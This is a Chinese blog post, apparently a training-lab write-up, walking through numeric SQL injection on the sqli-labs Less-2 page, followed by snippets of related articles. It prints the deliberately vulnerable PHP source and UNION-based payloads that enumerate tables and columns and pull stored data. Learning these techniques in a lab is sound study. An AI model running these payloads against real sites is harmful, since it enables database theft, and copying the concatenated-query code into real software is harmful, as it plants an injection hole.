sql注入--数字型

最新推荐文章于 2024-10-03 15:47:56 发布
最新推荐文章于 2024-10-03 15:47:56 发布
阅读量2.2k 收藏 2
点赞数
文章标签: sql php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pakho_C/article/details/122268973
版权

sql注入–数字型

靶场:sqli-labs-master
下载链接:靶场下载链接

第二关php源码

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);


// connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
echo $sql;
echo "<br/>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else
		{ 	
		echo "Please input the ID as parameter with numeric value";
		}

?>

补充知识:
1.php中双引号中语句会对变量进行解析,单引号中的不会
2.sql查询中如果查询条件不是数字的话,那么一定要加上引号,而数字型则不需要

首先测试?id=1
在这里插入图片描述
测试?id=abc
在这里插入图片描述
测试 ?id=’ %23
在这里插入图片描述

出现报错,说明我们的输入被拼接到了sql语句中并在后台进行查询了,并且查询条件中没有引号(因为使用单引号无法闭合),那么查询条件一定是数字,可以确定是数字型的注入

然后就和上一篇文章中的做法一样
sql注入–报错型

①.获取字段信息

SELECT * FROM users WHERE id=1 order by 3 # LIMIT 0,1

在这里插入图片描述
可以知道数据表存在3列

②.判断回显点

SELECT * FROM users WHERE id=0 union select 1,2,3 # LIMIT 0,1

由于数据库中不存在id为0的数据,故可以用此语句进行判断
在这里插入图片描述
由此可知,回显点为第2列和第3列

SELECT * FROM users WHERE id=0 union select 1,database(),version() # LIMIT 0,1

在这里插入图片描述
③.通过information_schema查询当前数据库中的所有表的名字

SELECT * FROM users WHERE id=0 union select 1,group_concat(table_name),user() from information_schema.tables where table_schema=database() # LIMIT 0,1

在这里插入图片描述
得到当前数据库中有4个表:emails,referers,uagents,users

④.通过联合查询information_schema中的columns获取表的字段名称

emails表

ELECT * FROM users WHERE id=0 union select 1,group_concat(column_name),user() from information_schema.columns where table_name='emails' # LIMIT 0,1

在这里插入图片描述
可得到emails表中有2个字段:id, email_id

referers表

SELECT * FROM users WHERE id=0 union select 1,group_concat(column_name),user() from information_schema.columns where table_name='referers' # LIMIT 0,1

在这里插入图片描述
得到referes表中有3个字段:id, referer,ip_address
其他表同理可得

⑤.获取指定表的数据信息
比如获取emails中的数据信息

SELECT * FROM users WHERE id=0 union select 1,id, email_id from emails where id=1 # LIMIT 0,1

在这里插入图片描述
其他表的信息同理可得

pakho_C
关注
SQL注入数字型注入
PatrickStar131的博客
08-23 331
用到piakchu靶场,burp抓包 进入靶场页面 通过提交查询得知由变量id来输出 然后进行抓包 找出输入的数字进行SQL语句拼接 id=1&submit=%E6%9F%A5%E8%AF%A2 union select username,password from users id=1 union select username,password from users&submit=%E6%9F%A5%E8%AF%A2 拼接后进行提交,此时靶场页面显示出...
SQL注入数字型
Vi_vids的博客
10-20 1971
基本漏洞篇 SQL注入数字型SQL注入就是在网站中注入sql语句,使其可以显示一些有用敏感信息 本章描述的数字型即是注入点为数字,采用GET方式 //sql_num.php <?php $conn = mysql_connect('localhost:3306','root','123456')or die('bad!'); //$conn定义一个名字为conn的变量 //使用账号root密码123456 去连接localhost这个mysql服务 mysql_query("SET NAMES
Pikachu-Sql Inject-数字型注入(POST)
最新发布
guanrongl的专栏
10-03 735
注意:若是数据显示只显示一行,将id=-1, 此处 id 的值必须是一个在数据库中 id 字段不存在的值,否则联合查询第一条语句的查询结 果将占据显示位,需要的第二条查询语句的查询结果就不能正常显示到浏览器中。3、用 and ‘1’='1 和 and ‘1’=‘2来判断,1’ and ‘1’ = ‘1,页面运行正常,而1’ and ‘1’ = '2,页面运行错误,则说明此 Sql 注入为字符型注入。1、用减法判断:利用id=2-1 如果返回的是id=1的结果,则是数字注入,否则是字符注入
SQL注入基础--数字型注入
qq_42988351的博客
04-02 8464
参考 参考学习链接 学习笔记–基础篇–sql注入数字型SQL注入简述 SQL注入,就是利用现有Web应用程序,构建特殊的参数输入,将(恶意的)SQL语句注入到后台数据库引擎,最终达到欺骗服务器执行恶意SQL语句的目的。 SQL注入的本质是后台SQL语句使用了拼接查询,未对用户输入的数据作安全处理。 SQL注入分类 根据注入形式的不同,可分为: 数字型注 字符型注 搜索型注入 根据请求方式的不同,可分为: GET型注 POST型注 HEADER型注入 根据注入点位置的不同,可分为: 列
SQL注入----数字型
weixin_43622525的博客
02-16 1752
目录 环境 实验 1、访问sqli-labs网站 2、寻找注入点 3、判断网站查询的字段数 ​4、判断网站的回显位置 5、获取网站当前所在数据库的库名 6、获取数据库security的全部表名​ 7、获取users表的全部字段名​ 8、获取users表id、username和password字段的全部值。 环境 windows 10 phpstudy2018 ,sqli-labs靶场,Firefox浏览器插件hackbar 实验 payload又称为攻击载荷,主要是用来建立目标
SQL注入-数据类型
m0_73902453的博客
07-27 1246
许多网页链接有类似的结构 http;id=1基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点id类型为数字,在大多数的网页中,诸如查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,重询出数据库中对应的信息,返回给前台。这一类的SQL语句原型大概为select* from表名 where id=1若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破: select* from表名where id=1 and 1=1。
SQL注入(一):数字型(手注)+利用+爆破
NSQ0207的博客
07-19 1294
查询语句:select id,email from member where username=$id
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3680
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
SQL注入---数值型注入(POST)
Ethan024的博客
03-22 533
SQL注入—数值型注入(POST)(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—数值型注入(POST) 实验步骤: 先查询一下下拉框的功能: 查看此时的URL:http://localhost/pikaqiu.cn/vul/sqli/sqli_id.php发现是post方式提交的请求,因为没有使用URL传参。 后端数据库查询逻辑:select name, email from table where id = n(1,2,3,4…) 使用Burpsuite
第四节 基于报错的SQL注入-01
09-15
数字型SQL注入是指在SQL语句中使用数字值作为输入参数,例如:`select * from table where id = 用户输入id`。字符型SQL注入是指在SQL语句中使用字符串值作为输入参数,例如:`select * from table where id = '用户...
CTF从零到一 SQL注入-2
shirazawah的博客
09-15 434
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
sql注入数字型注入
08-02
sql注入数字型注入
sql注入-不同数据类型注入
xiaoheizi的博客
06-28 346
原因是程序员为了防止SQL注入,就会调用几种转义函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上斜杠(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和斜杠(\)组合被当作一个汉字,从而保留单或双引号,使其发挥应有的作用。可以发现就算闭合了【''】依然无法注入成功,是因为我们输入的【'】被在前加上斜杠(\)进行了转义,无法发挥作用。
***学习笔记--基础篇--sql注入数字型
weixin_34364071的博客
09-28 629
环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium一、分析和查找注入点(1)知识点回顾如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的payload(有效载荷)的话,则我们必须先闭合前面的单引号或者双引号,否则我们的数据始终会被...
SQL注入原理-数值型注入
T1ngSh0w的博客
09-12 1630
SQL注入原理-数值型注入
SQL 数字型注入详解 + iwebsec实例
m0_50917178的博客
12-04 6485
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsec和Webgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字型注入原理 当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞,
sql注入-数字型注入步骤
qq_73661602的博客
06-21 927
select * from table where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema = '数据库名' and table_name='表名';(如果说屏幕上有两个显示位置,那我们就给两个参数1,2。因为数据库返回的字段不一定都会显示在前端中,因此我们需要找出显示的通道;确认通道后,我们按照按顺序分别找出数据库,表,列;
渗透学习笔记--基础篇--sql注入数字型
weixin_34239169的博客
02-19 398
环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium 一、分析和查找注入点 (1)知识点回顾 如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的p...
SQL手工注入——数字型注入
高毅的博客
07-01 2306
当输入的参数是整数时,若存在漏洞,则认为是数字型注入,如xxx.php?id=88形式。 这是最简单的一种注入。 测试过程一般如下: 1、对url:xxx.php?id=88后添加',形成xxx.php?id=88',观察页面是否出现异常。若系统没有做防护,则出现异常。 2、对url:xxx.php?id=88后添加and 1=1,能够正常执行,返回结果与原始请求无任何差异。 3、对ur
pikachu sql注入数字型
09-13
根据你提供的引用内容和,使用数字型注入进行SQL注入是一种常见的攻击方式。在使用数字型注入时,攻击者通常会尝试通过构造SQL语句中的数字参数来绕过应用程序的安全验证。 针对pikachu数据库的SQL注入,可以使用以下方法来实现数字型注入: 1. 首先,我们需要了解当前数据库中的表信息。可以通过使用UNION联合查询结合information_schema数据库来获取表名。具体的SQL语句如下: ``` SELECT 99, table_name FROM information_schema.tables WHERE table_schema = 'pikachu' ``` 这条语句将返回99和表名的结果。 2. 接下来,我们可以使用类似的方法获取表中的列名。通过UNION联合查询结合information_schema数据库中的columns表来获取列名。具体的SQL语句如下: ``` SELECT 99, column_name FROM information_schema.columns WHERE table_name = 'users' ``` 这条语句将返回99和列名的结果。 通过这些方法,我们可以逐步获取数据库的结构信息,进而进行更复杂的注入攻击。需要注意的是,SQL注入是一种非常危险的攻击方式,应该密切关注应用程序的安全性并采取相应的防护措施。同时,未经授权的SQL注入行为是非法的,严禁进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值